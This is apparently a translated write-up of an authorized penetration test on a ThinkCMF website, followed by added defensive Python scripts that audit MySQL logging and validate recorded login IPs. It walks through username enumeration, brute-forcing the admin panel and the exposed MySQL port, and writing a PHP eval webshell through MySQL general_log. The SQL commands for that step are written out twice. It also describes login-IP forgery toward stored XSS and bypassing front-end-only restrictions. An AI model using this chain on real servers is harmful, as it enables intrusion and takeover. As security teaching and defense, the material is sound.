
Title: Record an authorized penetration test


Preface

In a recent authorized test, I felt that getting a shell would not have been possible with any one step missing. A single vulnerability on its own is ordinary, but combined they can have an unexpected chemical effect.

Preliminary test

When I got this site, the member login interface was the first thing I saw. At first I thought about registering, but I figured the member functions would be very limited, and there was no verification code. If the backend administrator is also a member, couldn't I try that account on the backend?

It shows a mobile phone number login, but you can still try admin; don't be misled by its front end. By coincidence, usernames can be enumerated, and an admin account exists. It would be a pity not to brute-force it.

The dictionary was the Duck King's dictionary, a brute-forcing artifact. This dictionary has been used to crack many sites (https://github.com/TheKingOfDuck/fuzzDicts). This time I was lucky enough to crack it.

Once in the backend and logged in, it turned out the administrator does like to reuse the same password. When I saw that the upload suffixes could be customized in the backend, I thought it would be a happy exchange: add the php suffix and find a one-step getshell through the upload.

When I saw the editor used for uploading images, I felt things were not that simple. As expected, adding the suffix did not work.

I found that it was the ThinkCMF site-building system. I searched for vulnerabilities online and found a collection of them (https://www.hacking8.com/bug-web/ThinkCMS/ThinkCMF%E6%BC%8F%E6%B4%9E%E5%85%A8%E9%9B%86%E5%92%8C.html). I tried them one by one but failed. I kept searching (https://www.freebuf.com/vuls/217586.html). I tried basically all the payloads; either the vulnerabilities were fixed in this higher version or my exploitation method was not correct, but none were successfully exploited. Some methods are destructive to the website, and trying those is out of the question. Since I could not getshell so far, the task was to look for more vulnerabilities. If you can't getshell, find more loopholes; you can't ignore what the leader says.

Advanced Stage

When first opening the website, the Chrome plug-in Sensor (found on t00ls) can be installed to do an initial check for sensitive directories, such as backup files, phpmyadmin, phpinfo, etc. The existence of phpinfo was detected right from the start, and it revealed the absolute path of the website.

I used nmap to detect open ports and found that port 3306 was open to the public, and I already had an absolute path. I brute-forced 3306 without much hope; after all, I have rarely cracked a 3306 password. I used the super weak password check tool, again with the Duck King's dictionary. Who knows whether it was the dictionary's power or luck that cracked it? By the way, this was not a weak password; I can only say that the password was in the dictionary. As long as it is in the dictionary, it counts.

Next is the routine operation: try writing through the log.

show variables like '%general%'; View log status

SET GLOBAL general_log='on' Turn on log reading and writing

SET GLOBAL general_log_file='xxx.php' Specify log path

SELECT '?php eval($_POST['cmd']);' Write log into xxx.php

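From the defender's side, the log-to-webshell step above leaves an obvious trace: `general_log` switched on and `general_log_file` pointing at a script inside the web root. The following audit script is an added example, not code from the original post; it parses the tab-separated output of `mysql -N -B -e "SHOW VARIABLES LIKE '%general%'"` and flags the dangerous combinations. The web-root list and the sample output are constructed assumptions.

```python
"""Audit MySQL general_log settings for the log-written-to-webroot pattern."""
from pathlib import PurePosixPath

# Constructed sample: what `mysql -N -B -e "SHOW VARIABLES LIKE '%general%'"`
# prints on a server whose log has been pointed at a PHP file in the web root.
SAMPLE_OUTPUT = "general_log\tON\ngeneral_log_file\t/var/www/html/xxx.php\n"

# Assumed document roots; adjust to the real web server layout.
WEB_ROOTS = ("/var/www", "/usr/share/nginx/html")
SCRIPT_SUFFIXES = {".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx"}


def parse_show_variables(text):
    """Turn tab-separated `name<TAB>value` lines into a dict."""
    variables = {}
    for line in text.splitlines():
        if "\t" in line:
            name, _, value = line.partition("\t")
            variables[name.strip()] = value.strip()
    return variables


def audit_general_log(variables, web_roots=WEB_ROOTS):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    log_file = variables.get("general_log_file", "")
    path = PurePosixPath(log_file)
    if variables.get("general_log", "OFF").upper() == "ON":
        # The general log is a debugging aid; it should not stay on in production.
        findings.append("general_log is ON")
    if path.suffix.lower() in SCRIPT_SUFFIXES:
        findings.append(f"general_log_file has a script extension: {log_file}")
    roots = [PurePosixPath(r) for r in web_roots]
    if any(path == r or r in path.parents for r in roots):
        # mysqld should never be able to write under the document root at all;
        # run it as a user with no write permission there and keep 3306 off the internet.
        findings.append(f"general_log_file is inside a web root: {log_file}")
    return findings


if __name__ == "__main__":
    for finding in audit_general_log(parse_show_variables(SAMPLE_OUTPUT)):
        print("FINDING:", finding)
```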

Other vulnerabilities

Out of a sense of responsibility, some other vulnerabilities were also found. They are relatively less harmful, but they can still be written into the test report.

Login IP forgery: this backend, like most, has the habit of recording the user's login IP, but if the recorded IP is taken from the request, the attacker can forge the login IP. If the legitimacy of the IP is not verified, it is not impossible to construct an XSS payload and trigger a stored XSS. I have encountered this several times during tests. The stored XSS is located in the backend where the member login IP is recorded.

However, the only drawback here is that the backend checks the legitimacy of the IP. If it is an invalid IP, it is reset to 0.0.0.0.
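The check the author ran into is the right mitigation for the login-IP stored XSS described above. As an added example (not the target site's code), the function below does what that backend apparently does: it accepts a forwarded client address only from a trusted reverse proxy, requires it to parse as a real IP, and otherwise stores 0.0.0.0; output is HTML-escaped as a second layer. The proxy address and the sample requests are constructed assumptions.

```python
"""Record a login IP without trusting client-supplied junk."""
import html
import ipaddress

# Hypothetical reverse proxy that sits in front of the application.
TRUSTED_PROXIES = {"10.0.0.5"}


def client_ip_for_login_log(headers, peer_addr, trusted_proxies=TRUSTED_PROXIES):
    """Return the IP string to store for a login event.

    X-Forwarded-For is honoured only when the TCP peer is a trusted proxy
    (anyone can send the header, so it means nothing otherwise), and the
    chosen value must parse as an IPv4/IPv6 address. Anything else becomes
    0.0.0.0, which is what the backend in the post does with an invalid IP.
    """
    candidate = peer_addr
    if peer_addr in trusted_proxies:
        forwarded = headers.get("X-Forwarded-For", "")
        if forwarded:
            # Leftmost entry is the original client as seen by the proxy.
            candidate = forwarded.split(",")[0].strip()
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        return "0.0.0.0"


def render_login_row(ip):
    """Escape on output so even a bad stored value cannot become markup."""
    return f"<td>{html.escape(ip, quote=True)}</td>"


if __name__ == "__main__":
    # Constructed requests: a forged header from a direct client, a forged
    # header relayed by the proxy, and a legitimate forwarded address.
    print(client_ip_for_login_log({"X-Forwarded-For": "<script>alert(1)</script>"}, "198.51.100.7"))
    print(client_ip_for_login_log({"X-Forwarded-For": "<script>alert(1)</script>"}, "10.0.0.5"))
    print(client_ip_for_login_log({"X-Forwarded-For": "203.0.113.9, 10.0.0.5"}, "10.0.0.5"))
```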

After logging in through the privilege-bypass vulnerability, I found that the administrator could not operate on himself. This was embarrassing: the administrator could not change his own information.

A very simple approach is to find a link that can be modified and change the URL so that it modifies the administrator's information. In my experience, many restrictions on administrators changing their own information are only front-end restrictions.

Then a details page pops up, and it can be modified. Here, change the membership level to turn yourself from an ordinary member into a VIP. How can an administrator be an ordinary member?

Summary

1. Enter the admin account on the backend of the target site. With an arbitrary password, the password error is displayed, so the admin account exists.
2. Brute-force the admin account through the Intruder function of bp. The password dictionary is fuzzDicts (https://github.com/TheKingOfDuck/fuzzDicts), which cracked it successfully.
3. After entering the backend, an image upload exists, but uploads on the target site are restricted by a whitelist and a one-liner shell cannot be uploaded.
4. Through cloud cricket's CMS fingerprinting, the target site was identified as a ThinkCMF system. Several historical vulnerabilities were tested, but without result.
5. Information gathering with the Google Chrome plug-in Sensor found phpinfo.php, which displays the absolute path of the website.
6. Scanning the target site's IP with nmap found port 3306 open.
7. Port 3306 on the target site was brute-forced with the super weak password tool, and the password was finally cracked.
8. Remotely connect to the target site's MySQL through Navicat and write a one-liner through log logging at the SQL command terminal:
   show variables like '%general%'; View log status
   SET GLOBAL general_log='on' Turn on log reading and writing
   SET GLOBAL general_log_file='xxx.php' Specify log path
   SELECT '?php eval($_POST['cmd']);' Write the log into xxx.php
9. Finally, connect successfully through AntSword.

Source: https://xz.aliyun.com/t/10460
